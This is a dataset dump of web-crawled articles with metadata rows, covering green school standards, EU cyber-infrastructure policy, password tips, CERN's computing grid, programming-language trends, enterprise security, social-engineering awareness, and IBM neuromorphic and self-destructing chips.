text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62 values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1 value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
Everybody wants to be green these days, but some businesses and governments try to cheat. They implement token measures for public relations reasons that don't significantly increase energy efficiency, reduce carbon emissions or clean the environment. Many in the environmental community call it "greenwashing," said Kristin Heinen, assistant director of the Collaborative of High Performance Schools (CHPS).
The CHPS, joining public utilities, government agencies and other industries, sets the standard for green schools in California. The organization started as a project of the California Energy Commission, joining public utilities to promote greener, healthier schools in 1999. In 2001, the CHPS became a nonprofit organization.
The CHPS promotes "high-performance" standards aimed at making schools greener, healthier and more academically beneficial. To prevent greenwashing, the CHPS requires schools to clear two bars before classifying them as high-performance schools.
First, the school must meet 11 baseline standards. For example, energy efficiency must be at least 10 percent above the state's normal code requirement. After the school meets the 11 standards, it faces a point system in which it must earn 32 points to win the CHPS's endorsement. Schools earn these points for measures they take, in addition to the 11 baseline requirements in six categories. The first category is further energy efficiency. The second category is sustainable site selection, i.e., efforts to reduce hazards like erosion from water runoff. The third category is material efficiency, meaning avoiding natural resources for construction. The fourth is water usage efficiency, and the fifth is indoor environmental quality. The sixth category is policy and operation - the measures to operate and maintain the school's high-performance features.
A school could accrue all 32 points from just a few of those categories, or from all of them.
"It's really flexible for school districts," Heinen said. "Something that is really easy in Los Angeles could be really difficult for school districts in the central valley or the [San Francisco] Bay Area. It allows school districts to choose which points or features work best for their climate or local priorities. Obviously water is a bigger issue in Los Angeles than in the Bay Area. Los Angeles might want to choose more water efficiency credits."
More than 25 CHPS schools have finished construction so far, with another 100 under way. Several other states now pursue the CHPS's guidance on school construction. The organization will go national in 2008. What's Considered "High Performance"
In addition to green efforts, the CHPS requires measures to promote a healthy environment, like using paint, carpet and flooring with low emissions of harmful toxins.
"We have some pretty strict standards on ventilation in the classroom to make sure there is plenty of fresh air coming in," Heinen said. "If you're in a classroom with 30 kids, and one of them is sick, with poor ventilation, there is a higher chance all the other kids will get sick."
The CHPS argues that this health aspect directly leads to financial benefit for the schools because the less kids are sick, the more days they attend school, leading to more funding.
"The school gets more money, the children are healthier, and they're performing better, so everyone's happy," Heinen said.
Another aspect of CHPS high-performance standards is academic performance. For example, the organization mandates certain acoustical standards for schools sited near a highway or train track.
Schools can also get CHPS points for installing mechanisms designed to fill classrooms with natural light, rather than electric.
"Natural light is a lot easier on the eyes. It's a matter of orienting the building - putting it in a position where you can take advantage of sunlight during the daytime."
The buildings also use "light shelves" to bounce more light onto the ceilings, illuminating classrooms even more.
"They're like a shelf that hangs off the outside of the window," Heinen said. "Usually they look like they're decorative, but they actually perform a function."
CHPS schools also save money on maintenance costs because they involve many automated functions.
"A good example is waterless urinals. If you install waterless urinals, the way they're designed, water doesn't flush through them. The maintenance staff doesn't have to clean them every day," Heinen said. "We also require training of the maintenance operation staff so they know how to maintain and operate them." Solar Schools
Heinen said CHPS schools typically saved from 30 percent to 40 percent on their energy bills, compared to schools of similar sizes and locations.
The New Haven Unified School District (NHUSD) in California built Conley-Caraballo High School, a CHPS school in 2005 in Hayward. Roughly 85 percent of the school's electricity comes from its solar power facility.
The system cost roughly $840,000 but the school district only paid $440,000. Pacific Gas and Electric Co., the district's local utility, gave it a grant of $263,087, and state solar incentives covered the remainder.
The district estimates that the solar system will save roughly $40,000 per year, taking it roughly 10 to 12 years to recover its investment. The system's life expectancy is 20 to 30 years, meaning it will save the district roughly $1 million in the long run, according to estimates.
Enrique Palacios, executive director of operations for the NHUSD, plans to bring solar power to all schools in the district. Just as mass federal purchasing of recycled paper dropped the price of recycled paper in the market in general, during the 1970s and '80s, Palacios wants government to do the same with solar power.
"As we in the public sector get into buying more solar, then the cost of solar will drop and make it affordable for everybody," Palacios said, adding that he also embraces CHPS standards as a way to culturally influence kids to value green technology. | <urn:uuid:7620f468-bf57-4a0a-bc6b-cee7088a1dbd> | CC-MAIN-2017-09 | http://www.govtech.com/education/No-Greenwashing.html?page=2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169776.21/warc/CC-MAIN-20170219104609-00375-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.959983 | 1,215 | 3.140625 | 3 |
Electronic communication services and networks provide the backbone of European economy. 93% of EU companies and 51% of Europeans actively used the internet in 2007. However natural disasters, terrorist attacks, malicious human action and hardware failure can pose serious risks to Europe’s critical information infrastructures.
Recent large scale attacks on Estonia, Lithuania and Georgia proved that essential electronic communication services and networks are under constant threat. Preparing Europe to act in case of major disruptions or attacks is the goal of a new strategy proposed today by the European Commission.
In 2007, after large-scale cyber attacks, the Estonian Parliament had to shut down its email system for 12 hours and two major Estonian banks had to stop their online services. There is a 10% to 20% probability that telecom networks will be hit by a major breakdown in the next 10 years, with a potential global economic cost of around €193 billion ($250 billion). This could be caused by natural disasters, hardware failures, rupture of submarine cables (there were 50 incidents recorded in the Atlantic Ocean in 2007 alone), as well as from human actions such as terrorism or cyber attacks, which are becoming more and more sophisticated.
Smooth functioning of communications infrastructures is vital for European economy and society. Communications networks also underpin most of our activities in daily life. Purchases and sales over electronic networks amounted to 11% of total turnover of EU companies in 2007. 77% of businesses accessed banking services via internet and 65% of companies used online public services.
In 2008, the number of mobile phone lines was equivalent to 119% of the EU population. Communications infrastructure also underpins the functioning of key areas from energy distribution and water supply to transport, finance and other critical services.
The Commission today called for action to protect these critical information infrastructures by making the EU more prepared for and resistant to cyber attacks and disruptions. At the moment Member States’ approaches and capacities differ widely. A low level of preparedness in one country can make others more vulnerable, while a lack of coordination reduces the effectiveness of countermeasures.
Viviane Reding, Commissioner for Information Society and Media said:
The Information Society brings us countless new opportunities and it is our duty to ensure that it develops on a solid and sustainable base. Europe must be at the forefront in engaging citizens, businesses and public administrations to tackle the challenges of improving the security and resilience of Europe’s critical information infrastructures. There must be no weak links in Europe’s cyber security.
The European Commission wants all stakeholders, in particular businesses, public administrations and citizens to focus on the following issues:
Preparedness and prevention: fostering cooperation, exchange of information and transfer of good policy practices between Member States via a European Forum. Establishing a European Public-Private Partnership for Resilience, which will help businesses to share experience and information with public authorities. Both public and private actors should work together to ensure that adequate and consistent levels of preventive, detection, emergency and recovery measures are in place in all Member states.
Detection and response: supporting the development of a European information sharing and alert system.
Mitigation and recovery: stimulating stronger cooperation between Member States via national and multinational contingency plans and regular exercises for large-scale network security incident response and disaster recovery.
International cooperation: driving a Europe-wide debate to set EU priorities for the long term resilience and stability of the Internet, with a view to proposing principles and guidelines to be promoted internationally.
Establish criteria for European critical infrastructure in the ICT sector: the criteria and approaches currently vary across Member States.
The Commission today invited the European Network and Information Security Agency (ENISA) to support this initiative by fostering a dialogue between all actors and the cooperation necessary at the European level.
Mr. Andrea Pirotti, Executive Director of ENISA, confirmed today the ability of the Agency to support the initiative of the Commission, by strengthening its resources. Commenting on the communication, Mr Pirotti clarified:
ENISA is ready to pick up the gavel and support the European Commission in its efforts to address these crucial matters. The Agency is willing to do everything within its mandate to support all necessary actions of the EU and its Member States to combat these threats and to protect the economy of Europe, which, ultimately may be at stake. | <urn:uuid:a727f8b1-bce3-47b6-868c-4e1dd86727fc> | CC-MAIN-2017-09 | https://www.helpnetsecurity.com/2009/03/31/commission-acts-to-protect-europe-from-cyber-attacks-and-disruptions/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173405.40/warc/CC-MAIN-20170219104613-00303-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.939151 | 892 | 2.640625 | 3 |
I am one those people that have a very short attention span for technical instructions, so let me try to explain this as shortly and clearly as possible. Just in case you are like me. 🙂 The idea is to use a system that allows you to do 2 things:
1. Remember your passwords through writing a part of it down. The only thing you need to remember is a part that is the same for all your passwords; a pin if you will.
2. Create passwords that are good and strong, unique and can’t be guessed
Here are the step-by-step instructions:
1. Think of a “pin” for your password, this is the part that is same for all of your passwords. The pin should be 3 characters or longer, it could be something like “25!” and this part should be kept secret.
2. For each of the web sites that you need a password for, you create a code that helps you remember what site/service the password is for. For example aMa for Amazon and gMa for gmail.
3. Continue the password with a random set of 4 or more characters, for example: 2299 or xy76. You should use different random characters for your different passwords.
4. Write down parts 1 & 2 on a note and keep is safe so you don’t forget it. In this example you would end up with a note in your wallet with this written down:
5. When using the passwords, add your pin to them. Remember again that the pin should not be written down anywhere! You can decide the location of your pin too. With the example pin “25!” created in the first step we would end up with 2 passwords that could be:
Tadaa, you now have passwords that are unique and can’t be guessed! And of course you only need to remember a part of it! By having unique passwords you can also make sure that even if someone finds out one of your passwords, the others are still safe.
As a final note, should you choose to use this system, you should come up with your own passwords and not use the ones used in this post or in our Lab’s post.
Hopefully I managed to make it sound relatively easy. If not drop me a question below.
A recent PEW report says that 86 percent of people have taken action to avoid…
March 16, 2016
When George Lucas' Star Wars Episode IV: A New Hope hit theaters in May 25, 1977…
December 18, 2015 | <urn:uuid:5afba0b2-6e84-4eaa-8b84-707a303d5137> | CC-MAIN-2017-09 | https://safeandsavvy.f-secure.com/2010/03/15/how-to-create-and-remember-strong-passwords/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174276.22/warc/CC-MAIN-20170219104614-00479-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.945642 | 534 | 2.828125 | 3 |
Scientists at CERN, the European Organization for Nuclear Research, announced that they have observed a particle that might turn out to be the long-sought Higgs boson, or "God particle," thought to be part of the explanation for why matter has mass. And a worldwide network of computers played a key role in the discovery.
The particle is the heaviest boson ever found. If it is indeed the Higgs boson, it would give scientists a more complete understanding of the nature of the universe.
Scientists will have a clearer picture later this year after the Large Hadron Collider, the largest particle accelerator in the world, provides more data. "We now have more than double the data we had last year," said Sergio Bertolucci, CERN's director of research and computing, in a statement. "That should be enough to see whether the trends we were seeing in the 2011 data are still there."
CERN's 17-mile-long collider generates hundreds of millions of particle collisions each second. Recording, storing and analyzing these collisions represents a massive challenge; the collider produces roughly 20 million gigabytes of data each year.
CERN stores that data partly on the premises in Geneva, but has to distribute roughly 80% to data centers all around the world through the Worldwide LHC Computing Grid.
That network is key to CERN's research, said Rolf-Dieter Heuer, CERN's director general. "Without the worldwide grid," he said, "this result would not have happened."
This version of this story was originally published in Computerworld's print edition. It was adapted from an article that appeared earlier on Computerworld.com.
Read more about government/industries in Computerworld's Government/Industries Topic Center.
This story, "Global grid helps CERN find 'God particle'" was originally published by Computerworld. | <urn:uuid:7ea0d47d-8b81-4497-8918-624638988916> | CC-MAIN-2017-09 | http://www.itworld.com/article/2723644/data-center/global-grid-helps-cern-find--god-particle-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170875.20/warc/CC-MAIN-20170219104610-00423-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.949553 | 384 | 3.203125 | 3 |
Companies are building new applications everyday – whether it is to meet their own requirements or to serve their customers. Open source platforms are increasingly being used to support these applications, moving from initial development and experimentation into production.
For example, Apache Hadoop provides support for storage of huge volumes of data and companies are now looking at how to get more from their 'data lakes.' Meanwhile, new stacks of tools are being developed to help developers build their applications faster.
One example here is the SMACK stack, which includes the following components:
Spark – delivers near real-time and batch analytics on large volumes of data
Mesos – provides the 'operating system' for the data centre, or this case for all the components within the application
Akka – a toolkit and runtime for building highly concurrent, distributed and resilient message-driven applications
Cassandra – a distributed database management system that can cope with huge volumes of data, and Kafka – a message broker for managing and sending data.
Brought together, these elements provide the necessary building blocks for running applications that can handle hundreds or millions of transactions per second. This approach – based on open source projects – allows companies to scale up their applications by adding nodes to clusters, rather than having to migrate to newer and bigger appliances or server hardware. These technologies came from massive scaling needs and developed by the likes of Google, Amazon, LinkedIn and Facebook to run their operations.
In combination, these open source elements help companies run at scale while meeting customer expectations for service. However, there are a couple of elements that developers and CIOs both have to consider as these applications are moved into production. The first element is support.
Making open source and big data work in production
All the parts of the SMACK stack are helped by different projects within the Apache Software Foundation, with the exception of Akka which is available under the Apache License and supported by Typesafe. For CIOs, while the stack itself may interoperate well and people are available with skills that can support the individual parts, this can represent a challenge for running in production.
The communities around open source projects tend to be very active and growing, while commercial support is available for the open source toolsets involved. In 2016, I see more of the stack elements being supported by single companies to make this easier for CIOs to understand and get behind.
It’s easy to underestimate how important that 'single throat to choke' can be in running production IT systems, and open source continues to develop that approach in response to customer demand.
Alongside this, there are more options available for how data can be created and stored. There are many new database options available for IT teams to consider – the recent Gartner Magic Quadrant for Operational Databases in 2015 listed 30 vendors, all supporting their own products both open source and proprietary.
This variety offers IT teams a huge amount of choice and the potential to go down “best of breed routes” for their data; however, this can also lead to problems when it comes to support.
Next year, there should be greater consolidation in the market as vendors buy each other or start to support multiple database platforms under one roof. This should make it simpler for companies to run their critical applications on open source database platforms in the future.
Securing the future for open source applications
The second element here is security of data. Alongside the ability to run and support production volumes of data from a customer experience perspective, the security of that data is mission critical.
This has developed significantly over the past year as more companies begin to make the transition into running big data applications within their production applications. As these companies rely on those applications for revenue, the teams involved care more about security of the data they are putting into the system.
Both community and commercial open source projects are responding to this increasing demand for security. Steps like user and role-based authentication and management of object permissions can control the security of data stored within the database layer so that only those developers and team members allowed to view the data can access it.
Many of these open source platforms can work in fully distributed environments spread across the Cloud and on-premises clusters. For the NoSQL database Cassandra, the links between these clusters can be encrypted using SSL so that all data remains protected as well.
Alongside this, authentication of the nodes within Cassandra clusters to each other can be managed using Kerberos, LDAP or Active Directory when communication takes place over a non-secure network too.
For companies bringing together multiple open source tools that can pass data between each other, security of the elements involved should also be considered. Use of credentials for gaining access to components can ensure that authentication is completed, for example.
Alongside this, CIOs can work with their vendors to go through security requirements and ensure that their implementations are compliant with any relevant legislation as well as protected against outside attack.
Looking forward, many companies are implementing open source elements within their core business applications. This has gone beyond the web server infrastructure and into how business data is created, analysed and used to provide customer services. Supporting this move into production will be important for the future success of these applications.
Sourced Patrick McFadin, Chief Evangelist for Apache Cassandra, DataStax | <urn:uuid:db71df2e-2d54-4692-96de-131869f167c0> | CC-MAIN-2017-09 | http://www.information-age.com/how-safely-bet-your-business-open-source-support-apps-2-123460860/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00471-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.940739 | 1,081 | 2.6875 | 3 |
The recent the Hydraq attacks were the latest example of just how radically the Internet threat landscape has changed over the past few years, and how vulnerable companies and their information stores are to cyber attacks. The attackers were not hackers, they were criminals attempting to steal intellectual property. Hydraq is an example of how cybercrime has evolved from hackers simply pursuing public notoriety to covert, well-organized attacks that leverage insidious malware and social engineering tactics to target key individuals and penetrate corporate networks. Many of today's attacks are highly sophisticated espionage campaigns attempting to silently steal confidential information. This should raise the alarm for companies of all sizes and across all industries, as information is a business' most valuable asset. Information not only supports business, it also enables and helps drive it in a global marketplace in which having the right information at the right time can mean the difference between profitability and loss.
However, while information security has never been more important, it has also never been more challenging. Businesses have more information to protect at more points against more threats than ever before. In such an environment, businesses can build an effective defense only after they first understand the peculiarities of today's threat landscape and then identify their own specific areas of vulnerability. Armed with this information, organizations can then develop an information security blueprint that is right for them—one that is comprehensive, proactive, enforceable, and manageable.
More Threats, More Complexity
Today's headlines are rife with accounts of information security threats and data breaches, and this alarming trend is clearly borne out in statistics as well. For example, in 2009, Symantec identified more than 240 million distinct new malicious programs, a 100 percent increase over 2008.
However, viruses, worms and other types of malicious code are not the only threats to information today. Businesses now are also at risk from botnets, phishing attacks, and spam. Sixty percent of all data breaches that exposed identities were the result of hacking. In a sign that this issue is not limited to a few larger enterprises, the 2010 Symantec State of Enterprise Security Report found that 75 percent of enterprises surveyed experienced some form of cyber attack in 2009. And spam made up 88 percent of all email observed by Symantec. Of the 107 billion spam messages distributed globally per day on average, 85 percent were from botnets, according to the Symantec Internet Security Threat Report.
Protecting against security threats has also become more challenging as businesses deploy a greater variety of devices throughout their infrastructure. The laptops and desktops of yesterday are now complemented by smart phones, USB drives, and even portable entertainment devices that employees routinely bring into the workplace and connect to the company network. The corporate information infrastructure has also become more complex with the introduction of cloud computing, virtualization, and other important technologies that offer significant business benefits but must also be protected.
At the same time, the volume of information in the average company is doubling every two years, even as more and more people—from employees to suppliers, contractors, customers, and others—have access to corporate network resources and company information.
Not only are threats increasing in number and sophistication and information infrastructures becoming more complex, but security breaches are also being driven by different forces today. Too often, well-meaning employees who have legitimate access to corporate information lose their laptops or USB drives, and organizations follow broken business processes that put critical information at risk. Security breaches may also be launched by malicious insiders who have access to corporate information and resources and leverage their authorized status to deliberately cause a breach.
Perhaps the most dramatic development in the threat landscape is that external attacks are no longer being conducted primarily by hackers who want to bring systems down but by organized cybercriminals who operate in a well-organized and thriving global underground economy where stolen information and fraud-related tools and services are bought and sold around the clock.
In this professionalized environment, cybercriminals launch attacks in four stages, often using dedicated teams that specialize in a specific stage. The attack begins with an incursion phase, in which cybercriminals try to gain access to their potential victim's network by using a variety of malicious programs and tools. Once in, the attackers move to the discovery phase where they map out the assets of the company in order to find vulnerabilities in the company's infrastructure or business processes that could be exploited.
Upon discovering company assets, attackers then move into the capture phase where they find and seize information that has a black market value, such as credit card information, identities, customer or patient records, intellectual property, and more. Once this information is found and captured, the cybercriminals look to get that information out in the exfiltration phase of the attack.
Unfortunately, these four-phased attacks have proven to be highly successful when used against organizations of all sizes, from large government agencies, big retailers, and financial services giants to small and mid-sized businesses across the U.S.
Information Security Vulnerabilities and Remediation
While the threat and attack landscapes have become more sophisticated and diverse, the factors that lead to vulnerability to threats and attacks are surprisingly straightforward and simple. Today's security breaches and attacks target companies with poorly enforced IT policies, poorly protected information, poorly managed systems and poorly protected infrastructure.
Poorly enforced IT policies contribute to vulnerability, leaving businesses exposed to broken processes that hinder protection. Businesses can address this vulnerability by prioritizing risks and enforcing strong IT policies that span across their various locations, and by using automation and workflow tools that help them not only remediate incidents but also anticipate them.
Businesses with poorly protected information are vulnerable to security breaches and data loss because they do not know where their information assets are at any point in time or who has access to their information. To address this vulnerability, businesses need to take a more content-aware approach to protecting information so they know where sensitive data resides, who has access to it, and how it is coming in or leaving the company.
Businesses with poorly managed systems are vulnerable to security breaches and attacks because they cannot efficiently manage their IT infrastructure through its lifecycle. In 2008, Symantec documented 5,471 vulnerabilities, 80 percent of which were classified as easily exploitable. To address these vulnerabilities, businesses can leverage toolsets that provide integrated capabilities for managing security as well as provisioning, patching, licensing, workflow, and decommissioning.
Finally, a poorly protected infrastructure leads to increased vulnerability not only because the organization lacks the appropriate protective mechanisms but also because it does not have the visibility across the infrastructure that is required to identify gaps in protection and offer actionable recommendations for remediation. Businesses with a poorly protected infrastructure can address this vulnerability with integrated security technologies that provide insight into their infrastructure, proactive protection across the entire environment, and rapid response to emerging attacks.
Information security today is more challenging than ever. Yet, businesses can improve their security posture through understanding the threats and vulnerabilities of their environment and leveraging processes and tools to mitigate risk, thereby increasing their competitive edge in today's information-driven world.
The next article in this two-part series will examine how companies can put into place a security blueprint that enforces IT policies, protects their infrastructure and information, and manages systems more efficiently.
Francis deSouza leads engineering, product management, field enablement, business development, and operations for Symantec's Endpoint Security and Management, Data Loss Prevention, and Information Risk Management businesses. | <urn:uuid:e96ee483-52a4-40a5-997a-ae22aea5ca28> | CC-MAIN-2017-09 | http://www.csoonline.com/article/2125095/network-security/an-information-security-blueprint--part-1.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172077.66/warc/CC-MAIN-20170219104612-00171-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.954785 | 1,512 | 2.609375 | 3 |
No matter how advanced our computer security technology is, the weakest point is still us, the users. Hackers can often bypass the best scrutiny with our help using our kindness, willingness to help and other parts of just being humans against us. This is known as social engineering and its one of the most difficult attacks to protect against.
What is social engineering?
Wikipedia defines social engineering as ” psychological manipulation of people into performing actions or divulging confidential information.” That means using low tech methods to get us to do things we wouldn’t normally do.
Here are some examples:
Your building uses key cards to access doors to the building. Someone will approach you as you enter carrying boxes and say they can’t reach their card and asking you to hold the door for them. The average person would be willing to help in situations like this, we’ve all been carrying boxes and needed help with the door.
You receive an email from the tech support at your company informing you of new password policies and asking you to click on a link to update your password to make it more complex. The email is addressed to you directly and appears to come from the correct email address for text support.
You receive a phone call from someone who claims to be from your bank informing you that there has been some suspicious activity on your bank account. They ask you to confirm some purchases that you don’t recognize. They tell you that they will be sending you an email with a link for you to change your online banking password.
These are all examples of how attackers can use social engineering to get you to do something you wouldn’t normally do.
The top 5 ways hackers use social engineering
- Quid pro quo
Quid pro quo is Latin for “this for that”. It means to offer you something, an incentive, in exchange for your help.
Phishing is becoming the most common form of attack and uses some of pretexting to be effective. It is the use of very carefully crafted emails that are sent to a target and gets the victim to click on links that in turn, will infect the target’s computer with malware.
Tailgating is following someone into a secured area, such the person carrying the boxes mentioned above. They use our willingness to help and to be kind as a way to get around security procedures.
Baiting is where an attacker will leave infected USB flash drives around in the hopes that a victim will plug them into a computer to see what is on them. They computer will then be infected and the attacker can begin his work.
We’ve outlined the most common forms of social engineering that an attacker will use to go after us, the users. By being on the look out for these types of attacks. you can help prevent yourself from being taken advantage of.
If you have any questions on this or want to make sure your own organization is protected from the most common attacks, please contact us at 770-506-4383 to schedule your free assessment. | <urn:uuid:214f327b-8f90-4869-8b2c-2558052ede9d> | CC-MAIN-2017-09 | http://ironcomet.com/5-social-engineering-tactics-hackers-trick/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170651.78/warc/CC-MAIN-20170219104610-00291-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.964927 | 623 | 3.296875 | 3 |
By Adam Dickter / CIO Today. Updated February 07, 2014.
We've already got the technology to remotely wipe data from our devices if they are lost or stolen. But the U.S. Department of Defense (DoD) wants to go one step further with sophisticated sensor devices it hopes to use on the battlefields of the future.
With the help of tech giant IBM, the DoD wants to deploy gadgets that can be blown to bits via remote control to keep them from falling into enemy hands.
Glass As Driving Force
The department's Defense Advanced Research Projects Agency last month awarded Big Blue a contract worth $3.45 million for Vanishing Programmable Resources, (VAPR) a cute acronym for a technology that basically vaporizes electronics.
The grant published on the government's General Services Administration Web site, and first reported by the British Broadcasting Company, aims to "develop and establish a basis set of materials, components, integration, and manufacturing capabilities to undergird this new class of electronics."
According to the DARPA synopsis, IBM will use strained glass substrates to shatter as the driving force to reduce device chips to worthless powder.
"A trigger, such as a fuse or a reactive metal layer will be used to initiate shattering, in at least one location, on the glass substrate," it said. "An external [radio frequency] signal will be required for this process to be initiated. IBM will explore various schemes to enhance glass shattering and techniques to transfer this into the attached CMOS [complementary metal oxide semiconductor] devices."
The announcement comes at the same time that the California state Senate is considering a bill that would empower civilians to do something similar, though less destructive, by mandating so-called "kill switches" that would render smartphones inoperable if stolen.
Charles King, principal analyst at Pund-IT, told us that bricking a device or wiping out data might be OK for a device that holds personal information or trade secrets, but not for the military.
Digital Poison Pill
"Practically speaking, it’s an added layer of security," said King. "Data wiping requires the device be connected to some sort of IP-enabled network which allows the wipe command to be transmitted. I’m not quite sure how the self-destruct command would be triggered in this case. Maybe by the digital version of a poison pill inserted into a hollow tooth?"
King added that the sensor devices the military is considering would likely be more effective for reconnaissance than eyes in the sky in the form of drones and satellites.
"As sophisticated as they are, satellites can’t see/do everything, particularly in contextualizing situations and locales," he said. "This sounds like it’s mainly designed for 'boots on the ground' scenarios where soldiers get up close and personal with the areas/people they’re engaging.
As for civilian uses once the technology is perfected? "If it were cheap enough, it’d be a heck of a way to deter kids from buying excess apps or exceeding their call/texting limits," King said, jokingly. "Could also apply it to friends/neighbors who fail to return the items they borrow." | <urn:uuid:599f2ee4-7220-47d5-a298-aaf1ca62517b> | CC-MAIN-2017-09 | http://www.cio-today.com/article/index.php?story_id=91473 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170651.78/warc/CC-MAIN-20170219104610-00291-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.934054 | 664 | 2.625 | 3 |
Gates drove Microsoft's focus toward developer tools and application foundations in a way that tracked the evolving nature of the developer community.
When Bill Gates first became interested in computers, being a user of a small computer meant being a hobbyist programmer-not a gamer, not a video producer, not a social networker. It's therefore no surprise that Gates drove Microsoft's focus toward developer tools and application foundations in a way that tracked the evolving nature of the developer community.
When anyone buying a PC was at least somewhat interested in programming, typing BASICA at the DOS prompt opened the door to an out-of-the-box ability for the machine to learn and to follow new instructions.
When "power users" became important to the adoption and spread of PCs as workplace tools, mechanisms such as DOS batch files and command shells were there to pave the way toward building more automated environments.
When graphical interaction moved beyond the novelty of the Macintosh-handicapped in its early years by costly and quirky development tools-to become the expected norm for mainstream applications, Microsoft's Visual Basic was an enormous leap in the ease of designing an interface and populating it with application behavior.
As a major side effect, though, VB arguably warped a generation of budding programming talent in the process-and thereon hangs a tale. | <urn:uuid:be3bcd44-fa74-42f3-a29b-8366e3c48feb> | CC-MAIN-2017-09 | http://www.eweek.com/c/a/Application-Development/How-Bill-Gates-Redefined-Application-Development | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170651.78/warc/CC-MAIN-20170219104610-00291-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.950391 | 267 | 2.609375 | 3 |
The reason for the shift is that new Web development technologies better fit today's mobile platforms, said Cameron Purdy, vice president of development for Oracle, at the QCon software conference in New York on Tuesday.
To boost his argument, Purdy examined the reasons behind Java's rise in popularity in the mid-1990s, when C++ was then the dominant programming language for building enterprise applications.
Many have attributed the rapid success of Java to the efforts of the company that created it, Sun Microsystems, but this wasn't strictly the case, Purdy argued. "Java wasn't big because it was well-marketed ... Sun couldn't market its way out of a paper bag," he said. (Oracle now owns the trademarks to Java.) Rather, Java grew in popularity because it best fit the needs of the developers at the time. "There were real technical reasons that Java was important," he said.
At the time, Java simplified programming in a number of ways. It automated garbage collection, the act of freeing up memory that is no longer used. Writing code to free memory in C++ programs can be burdensome to programmers. Also, by automating garbage collections, Java was able to pave the way for the greater use of frameworks, or sets of libraries that automated various routine tasks. Also, Java was better suited for running across multiple platforms, a capability C++ offered in theory though was difficult to implement.
C++ does have some upsides, Purdy admitted. It is faster, thanks to how the code is compiled directly against a specific hardware platform. Also, Java's garbage collection routine can slow the operation of a program at inopportune times, even with careful scheduling. Another upside: A C++ program does not take up as much memory as a Java program, because it does not need as many supporting files and is written for the specific architecture it is being run upon.
But these advantages weren't of high importance for programmers when the Web was just emerging. Memory wasn't a huge issue, because Java applications tended to be run from a server, which tended to have a generous supply of memory. Nor was speed a critical issue. Most of the long start-up times that are associated with Java programs come from times needed to start a Java Virtual Machine (JVM) to run the program. But the application server software typically keeps the JVM running continuously, meaning that Java applications could be just as speedy as their C++ counterparts. "How often do you start your Web application? Once a day? Once a month?" Purdy asked.
Also, Java programs are better suited for running on multicore processors than C++ programs, Purdy argued. Programming for multicore processors can be a tedious task in C++. In contrast, Java's virtual machine handles the issue of which processors to use.
"All the benefits of C++ were not valuable. The strengths of Java are well-suited for this world," Purdy concluded. Though C and C++ are particularly suited for writing to a particular platform, crucial when developing an operating system or browser, such development efforts are not always called for. "How many browsers do we need?" he asked, rhetorically. "There are just not many places I need C++," he said.
The programming needs today promise a similar disruption as when Java supplanted C++, Purdy said. We are moving from a server-side architecture to what Purdy called a "thin server architecture," he said. He attributes this shift to a combination of cloud computing, HTML5 and mobile devices.
"These three things will conspire to be a perfect storm in our industry," Purdy said.
"Applications will shift from a very fat server model, where all the display logic is held on the server, to a much more thin server model where the display logic is in the browser itself," Purdy said. "Its communications with the server is with services and data."
Purdy's claim seems to get some backing from other parties who also see that Web application development is taking hold in the enterprise market. In a survey sponsored by Zend, a company that offers commercial support tools for the PHP Web programming language, 97 percent of 117 business and IT executives who said their organizations currently use PHP will use the Web programming language for additional applications in the future. Many cited the speed and flexibility of Web application development as a factor for choosing this approach over the more traditional approach of developing desktop applications.
The QCon conference runs through Wednesday. | <urn:uuid:66216788-f09f-4f51-bdd2-df97c7bd9e9c> | CC-MAIN-2017-09 | http://www.computerworld.com/article/2504654/app-development/qcon--application-development-faces-seismic-shift.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170925.44/warc/CC-MAIN-20170219104610-00467-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.963188 | 920 | 2.609375 | 3 |
A new low-power, "brain-inspired" supercomputing platform based on IBM chip technology will soon start exploring deep learning for the U.S. nuclear program.
Lawrence Livermore National Laboratory announced on Tuesday that it has purchased the platform, based on the TrueNorth neurosynaptic chip IBM introduced in 2014. It will use the technology to evaluate machine-learning and deep-learning applications for the National Nuclear Security Administration.
The computer will process data with the equivalent of 16 million neurons and 4 billion synapses and consume roughly as much energy as a tablet PC. Also included will be an accompanying ecosystem consisting of a simulator; a programming language; an integrated programming environment; a library of algorithms and applications; firmware; tools for composing neural networks for deep learning; a teaching curriculum; and cloud enablement.
A single TrueNorth processor consists of 5.4 billion transistors wired together to create an array of one million digital neurons that communicate with one another via 256 million electrical synapses.
With 16 TrueNorth chips, the new system will consume a mere 2.5 watts of power, allowing it to infer complex cognitive tasks such as pattern recognition and integrated sensory processing far more efficiently than conventional chips can, IBM said.
TrueNorth was originally developed under the auspices of the Defense Advanced Research Projects Agency’s (DARPA) Systems of Neuromorphic Adaptive Plastic Scalable Electronics (SyNAPSE) program in collaboration with Cornell University.
Lawrence Livermore will collaborate on the technology with IBM Research, universities and other partners within the Department of Energy.
